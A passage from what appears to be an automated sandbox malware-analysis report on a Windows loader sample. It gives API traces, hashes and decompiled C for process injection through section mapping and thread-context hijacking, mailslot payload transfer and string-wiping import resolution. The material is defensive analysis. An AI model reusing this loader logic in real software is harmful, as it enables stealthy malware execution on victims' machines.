Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 010.exe Analysis ID: 63143

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	39E01E2F5A5FBFECA5ABC01131E7E3A1
Total matches:	33
Initial Analysis Report:	Open
Initial sample Analysis ID:	63143
Initial sample SHA 256:	9F7B02032349637F0D8C962DAB2F08F0E3269C295AC0DE385C60274E89390D4B
Initial sample name:	01.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
